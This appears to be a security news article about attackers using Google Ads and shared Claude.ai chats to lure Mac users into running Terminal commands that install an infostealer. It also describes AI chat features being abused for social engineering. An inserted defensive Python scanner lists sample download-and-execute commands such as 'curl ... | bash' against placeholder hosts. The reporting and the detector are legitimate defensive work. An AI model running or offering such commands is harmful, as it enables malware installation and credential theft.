TL;DR
Hackers are using Google Ads and legitimate Claude.ai shared chats to push malware onto Mac users. The campaign involves malicious instructions within shared chats hosted on Claude.ai, leading to silent malware downloads. Researchers have identified multiple variants, with ongoing efforts to analyze and counter these attacks.
Cybercriminals are actively exploiting Google Ads and legitimate Claude.ai shared chats to deliver malware to Mac users, according to recent security research. The campaign involves malicious instructions embedded within shared Claude chats that, when followed, silently download and execute malware on victims’ Macs. This development raises concerns about the misuse of AI platforms and ad networks for cyberattacks.
Security researcher Berk Albayrak from Trendyol Group first identified the campaign, which involves malicious Claude.ai shared chats that pose as official installation guides. These chats instruct users to open Terminal and execute commands that download encoded shell scripts, which then run in memory, making detection difficult. The scripts also perform victim profiling, collecting system information and exfiltrating data such as credentials and cookies, primarily targeting macOS users.
Two separate shared chats were found, hosted on different domains and infrastructure, but following similar social engineering approaches. The first, identified by Albayrak, appears to be a variant of the MacSync macOS infostealer, which harvests browser credentials and Keychain data. The second, observed by BleepingComputer, also delivers a payload through obfuscated scripts, with some variants skipping profiling steps and directly executing malicious payloads.
The campaign relies on legitimate-looking Google Ads that point to the real claude.ai domain; the malicious instructions are embedded within shared chats hosted on the platform itself. This abuse of AI chat-sharing features is not the first such incident: similar campaigns targeting ChatGPT and Grok have been documented previously. Researchers advise users to avoid following terminal commands from unverified sources and to download software directly from official sites.
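A defensive sketch of the pattern described above, added here as an example and not taken from the researchers' reports: it flags pasted Terminal commands that hand downloaded or decoded content straight to an interpreter, which is what lets a script run without being written to disk. The sample commands and the `example.invalid` hosts are constructed, since the article does not publish the actual commands, and the reason labels are hypothetical names.

```python
import re

# Tools that pull content from the network.
FETCH = re.compile(r"\b(curl|wget)\b")
# Decoders used to unwrap an encoded script (macOS base64 accepts -D and -d).
DECODE = re.compile(r"\bbase64\s+(-d|-D|--decode)\b|\bxxd\s+-r\b")
# A pipeline stage that starts with an interpreter reading its program from stdin.
INTERP = re.compile(r"^\s*(sudo\s+)?(/usr)?(/bin/)?(sh|bash|zsh|osascript|python3?|perl)\b")
# Interpreter or eval fed by command substitution, e.g. bash -c "$(curl ...)".
SUBST = re.compile(r"(?<![\w.-])(sh|bash|zsh|eval)\b[^|;]*(\$\(|`)[^)`]*\b(curl|wget|base64)\b")
# Split on a single '|' only, so '||' stays inside its stage.
PIPE = re.compile(r"(?<!\|)\|(?!\|)")


def classify(command):
    """Return sorted reasons why a pasted command is risky; empty list if none."""
    reasons = set()
    seen_fetch = seen_decode = False
    for i, stage in enumerate(PIPE.split(command)):
        # An interpreter later in the pipeline executes whatever came before it.
        if i > 0 and INTERP.match(stage):
            if seen_fetch:
                reasons.add("fetch-to-interpreter")
            if seen_decode:
                reasons.add("decode-to-interpreter")
        seen_fetch = seen_fetch or bool(FETCH.search(stage))
        seen_decode = seen_decode or bool(DECODE.search(stage))
    if SUBST.search(command):
        reasons.add("substitution-to-interpreter")
    return sorted(reasons)


def scan(commands):
    """Map each flagged command to its reasons; benign commands are omitted."""
    return {c: r for c in commands if (r := classify(c))}


# Constructed sample input: commands a user might be told to paste.
SAMPLES = [
    "curl -fsSL https://downloads.example.invalid/install.sh | bash",
    "echo 'Y29uc3RydWN0ZWQ=' | base64 -D | zsh",
    "curl -s https://example.invalid/p | base64 -d | sh",
    'bash -c "$(curl -fsSL https://example.invalid/i.sh)"',
    "brew install wget",
    "curl -O https://example.invalid/app.dmg",
    "cat notes.txt | grep foo || true",
]

if __name__ == "__main__":
    for cmd, why in scan(SAMPLES).items():
        print(f"{', '.join(why):45} {cmd}")
```

The heuristic is string-based and meant for triaging shell history or clipboard content before execution; it does not replace endpoint telemetry on process lineage.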
Why It Matters
This campaign demonstrates how cybercriminals are leveraging trusted platforms and ad networks to distribute malware, increasing the risk for unsuspecting users. The use of AI chat features for malicious purposes highlights new attack vectors in the evolving cybersecurity landscape. For Mac users, the campaign underscores the importance of cautious behavior when following online instructions and the need for robust security measures.
Background
Malvertising campaigns have historically exploited search engines and ad networks to deliver malware, often involving fake or lookalike websites. This recent campaign is notable for abusing Claude.ai’s shared chat feature, which is designed for collaboration, to host malicious instructions. Previous incidents have targeted AI platforms like ChatGPT, but this is among the first known cases involving Claude.ai. The campaign’s use of polymorphic payloads and victim profiling techniques indicates a sophisticated operation aimed at selectively targeting users.
“The shared Claude chats are being weaponized to deliver malware through social engineering, with malicious instructions embedded in what appear to be legitimate guides.”
— Berk Albayrak, security engineer at Trendyol Group
“Researchers have identified multiple variants of the campaign, with some scripts skipping profiling and directly executing payloads, making detection more challenging.”
— BleepingComputer
What Remains Unclear
It remains unclear how widespread the campaign is, whether additional variants exist, and if other AI platforms are being similarly exploited. The full scope of affected users and the extent of infrastructure used by attackers are still being investigated.
What’s Next
Security researchers and platform administrators are expected to continue analyzing the campaign, with potential updates on additional variants or infrastructure. Users are advised to avoid executing terminal commands from unverified sources and to rely on official app downloads. Further advisories may be issued to mitigate risk and improve detection capabilities.
Key Questions
How can I protect myself from this malware campaign?
Always download software from official sources, avoid executing commands from untrusted chats or links, and keep security software up to date. Be cautious of unsolicited instructions asking for terminal commands, even if they appear in trusted AI platforms.
Are Google Ads involved in this campaign?
Yes, attackers are abusing Google Ads to direct users to legitimate-looking Claude.ai shared chats containing malicious instructions.
What should I do if I encounter a malicious shared chat?
Report the chat to platform administrators, avoid following any embedded commands, and run security scans on your device. Do not execute commands or download files from suspicious sources.
Is this campaign affecting other platforms besides Claude.ai?
Currently, evidence suggests the campaign targets Claude.ai shared chats, but similar tactics have been used against other AI platforms like ChatGPT. Ongoing investigations will clarify the full scope.